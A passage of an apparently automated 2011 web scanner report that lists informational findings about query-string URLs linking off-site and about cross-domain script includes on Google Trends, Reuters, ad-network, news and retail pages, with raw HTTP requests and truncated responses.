Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=sprint&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:37 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11163
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: sprint, Sep 3, 2011</tit
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.engadget.com/2011/09/02/kyocera-milano-coming-to-sprint-september-9th-for-50-looks-not/" target="_blank">
Kyocera Milano coming to <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.engadget.com/" target="_blank"> http://www.engadget.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://techcrunch.com/2011/09/01/sprint-attt-mobile-merger-would-destroy-jobs-heres-a-study-to-prove-it/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://techcrunch.com/" target="_blank"> http://techcrunch.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://mashable.com/2011/08/31/sprint-att-t-mobile-2/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://mashable.com/" target="_blank"> http://mashable.com/</a>
...[SNIP]...

20.26. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:28 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11371
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: notre dame football, Sep
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.yougabsports.com/pt/The-Beezes-2011-Notre-Dame-Football-Preview/blog.htm" target="_blank">
- The Beezes 2011 <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.yougabsports.com/" target="_blank"> http://www.yougabsports.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://dailypostal.com/2011/09/03/notre-dame-football-schedule-2011/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://dailypostal.com/" target="_blank"> http://dailypostal.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.212articles.com/usf-football-at-notre-dame-preview/" target="_blank">
USF <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.212articles.com/" target="_blank"> http://www.212articles.com/</a>
...[SNIP]...

20.27. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=usc+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:32 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11438
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: usc football, Sep 3, 201
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.scpr.org/news/2011/09/03/28641/usc-football-season-begins-new-plans-security-traf/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://podcasts.scpr.org/news" target="_blank"> http://podcasts.scpr.org/news</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.conquestchronicles.com/2011/9/2/2400765/so-lets-get-ready-for-some-usc-football" target="_blank">
So lets get ready for some <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.conquestchronicles.com/" target="_blank"> http://www.conquestchronicles.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.212articles.com/usc-football-trojans-defeat-minnesota-19-17/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.212articles.com/" target="_blank"> http://www.212articles.com/</a>
...[SNIP]...

20.28. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=printable+coupons&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:44:07 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11281
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: printable coupons, Sep 3
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.passionforsavings.com/2011/09/printable-coupons-dial-scotties-tetley-biotrue-fiber-one/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.passionforsavings.com/" target="_blank"> http://www.passionforsavings.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.commonsensewithmoney.com/2011/09/printable-coupons-international-delight-mean-green-tyson-grilled-products-more/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.commonsensewithmoney.com/" target="_blank"> http://www.commonsensewithmoney.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.wickedcooldeals.com/2011/09/coupon-network-new-printable-coupons-2.html" target="_blank">
Coupon Network: New <b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.wickedcooldeals.com/" target="_blank"> http://www.wickedcooldeals.com/</a>
...[SNIP]...

20.29. http://www.google.com/trends/hottrends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /trends/hottrends

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /trends/hottrends?q=michigan+football&date=2011-9-3&sa=X HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; S=izeitgeist-ad-metrics=t0E3hsRy46s

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 04 Sep 2011 00:41:30 GMT
Server: Google Trends
Cache-Control: private
Content-Length: 11486
X-XSS-Protection: 1; mode=block

<html>
<head>
<meta HTTP-EQUIV="content-type" CONTENT="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/trends/html/gsearch.css">
<title>Google Trends: michigan football, Sep 3
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.bucksinsider.com/big-10/michigan-football-western-michigan-preview/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.bucksinsider.com/" target="_blank"> http://www.bucksinsider.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://dailypostal.com/2011/09/03/michigan-football-2011-schedule/" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://dailypostal.com/" target="_blank"> http://dailypostal.com/</a>
...[SNIP]...
<div class="gs-title"> <a class="gs-title" href="http://www.make100dollarstoday.com/michigan-football-stadium-cleared-due-to-lightning-game-ended-754" target="_blank">
<b>
...[SNIP]...
<div class="gs-visibleUrl"> <a class=" gs-visibleUrl gs-visibleUrl-short" href="http://www.make100dollarstoday.com/" target="_blank"> http://www.make100dollarstoday.com/</a>
...[SNIP]...

20.30. http://www.reuters.com/assets/commentsChild

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:15 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:41:45 GMT
Age: 270
Vary: Accept-Encoding
Content-Length: 5297
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF43 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:41:45 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21. Cross-domain script include
There are 83 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


21.1. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/13966-88303-3335-5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad/js/13966-88303-3335-5?mpt=1119678&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/x%3B245665919%3B0-0%3B1%3B43087964%3B3454-728/90%3B43451397/43469184/1%3B%3B%7Eokv%3D%3Btype%3Dleaderboard%3Bsz%3D728x90%3Btile%3D1%3Bvbc%3Dcfa%3BarticleID%3DUSTRE78222D20110903%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 517
Date: Sun, 04 Sep 2011 00:45:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b78/3/0/*/x;245665919;0-0;1;43087964;3454-728/90;43451397/43469184/1;;~okv=;type=leaderboard;sz=728x90;tile=1;vbc=cfa;art
...[SNIP]...
</a><script language="JavaScript" src="http://js.c12s.com/ant-cf.js?0_740_139668830333355_0_53_100004"></script>
...[SNIP]...

21.2. http://cdn.optmd.com/V2/89733/235451/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/89733/235451/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /V2/89733/235451/index.html HTTP/1.1
Host: cdn.optmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 02 Sep 2011 20:55:36 GMT
ETag: "ce5613-1a3-4abfb95404200"
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:12 GMT
Content-Length: 419
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Personal Creations</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/"></script>
...[SNIP]...

21.3. http://charlotteobserver.adperfect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://charlotteobserver.adperfect.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:16 GMT
Server: Apache
MIME-Version: 1.0
Content-Length: 15034
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       
           <title>O
...[SNIP]...
<meta http-equiv="expires" content="mon, 22 jul 2002 11:12:01 gmt" />
       
       
       <script src="http://d2acq6zvr4qvep.cloudfront.net/library/47B8B7F11188014BC6OqLI9C3DA1/assets/jstext.global.20110829151635.js" type="text/javascript"></script>
<script type="text/javascript" src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquery/v1.3.2/jquery-1.3.2.min.js"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/combined_1314384833.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerycaret/jcaret.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/lazyload-min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/json2.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/privateparty_1313193312.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/loadselect_1313193312.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryui/v1.7.2/jquery-ui-1.7.2.custom.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryqueue/v1.0/ajaxqueue.1.0.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jqueryscrollto/v1.4.2/jquery.scrollTo.1.4.2.min.js" type="text/javascript"></script>
<script src="http://d2acq6zvr4qvep.cloudfront.net/assets/core/scripts/libraries/jquerytools/v1.2.2/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
<link href="http://www.charlotteobserver.com/static/styles/vendor/vendor_ap/headerTemplate.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/sites/clt/charlotteobserver.js"></script>
...[SNIP]...
<!-- SiteCatalyst: McClatchy Vendor Stats Tag v.1.0 -->
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/vendors/adperfect_s_code.js"></script>
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/vendors/adperfect.js"></script>
<script type="text/javascript" src="http://media.charlotteobserver.com/mistats/finalizestats.js"></script>
...[SNIP]...

21.4. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...
<!-- minimum jQuery version required by all scripts-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

21.5. http://delivery.sprint.com/m/p/nxt/reg/cmb/generic.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delivery.sprint.com
Path:   /m/p/nxt/reg/cmb/generic.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/p/nxt/reg/cmb/generic.asp HTTP/1.1
Host: delivery.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 9338
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:22:23 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML XMLNS="http://www.w3.org/1999/xhtml">
   <HEAD>
    <META HTTP-E
...[SNIP]...
<!--// jQuery Library //-->
       <SCRIPT TYPE="text/javascript" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery-1.3.2.min.js"></SCRIPT>
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.radio_btn.js" ></SCRIPT>
       <SCRIPT TYPE="text/javascript" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.ifixpng.js"></SCRIPT>

       <!-- Validation dependencies -->
   <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/jquery.validate-1.5.5.min.js"></SCRIPT>

       <!--// User JS Libraries //-->
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/sprintHFFunctions.js"></SCRIPT>
       <SCRIPT TYPE="text/javascript" CHARSET="utf-8" SRC="http://a676.g.akamaitech.net/f/676/773/1d/images.delivery.net/cm50content/1529/insider/js/userLIB.js"></SCRIPT>
...[SNIP]...

21.6. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=26937 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8468

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</div>

<script src="http://cdn4.diggstatic.com/js/two_column/common/fb_loader.7fbbdd84.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/two_column/lib.655e7d5e.js" type="text/javascript"></script>
...[SNIP]...

21.7. http://grfx.cstv.com/scripts/oas-omni-controls.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /scripts/oas-omni-controls.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scripts/oas-omni-controls.js HTTP/1.1
Host: grfx.cstv.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Accept-Ranges: bytes
ETag: "3912956150"
Last-Modified: Wed, 26 Jan 2011 17:07:09 GMT
Content-Length: 10053
Server: lighttpd
Date: Sun, 04 Sep 2011 00:42:36 GMT
Connection: close

/*
created by david parnell
copyright College Sports Online, Inc.
no part of this application may be used, duplicated or accessed without permission
*/
var NS4 = (document.layers) ? true : false;
var
...[SNIP]...
</script>');
// now calls http://grfx.cstv.com/scripts/mantaray.js from ncaa/library/scripts/cookieCheck.js for Madison for NCAA
//document.writeln('<script language="javascript" src="http://ocp.ncaa.com/adFunctions.js?site=188"></script>');
//document.writeln('<script language="javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-sports.js"></script>
...[SNIP]...

21.8. http://itunes.apple.com/us/app/the-sacramento-bee-for-ipad/id446757012

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/the-sacramento-bee-for-ipad/id446757012

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/app/the-sacramento-bee-for-ipad/id446757012 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 04 Sep 2011 01:22:45 GMT
x-apple-orig-url-path: /us/app/the-sacramento-bee-for-ipad/id446757012
x-apple-application-site: ST11
x-apple-max-age: 3600
x-apple-aka-ttl: Generated Sat Sep 03 18:22:45 PDT 2011, Expires Sat Sep 03 18:23:45 PDT 2011, TTL 60s
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?id=446757012&cc=us
x-apple-application-instance: 2011002
Content-Type: text/html; charset=UTF-8
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=55
Date: Sun, 04 Sep 2011 01:22:45 GMT
Content-Length: 27908
Connection: close
X-Apple-Partner: origin.0

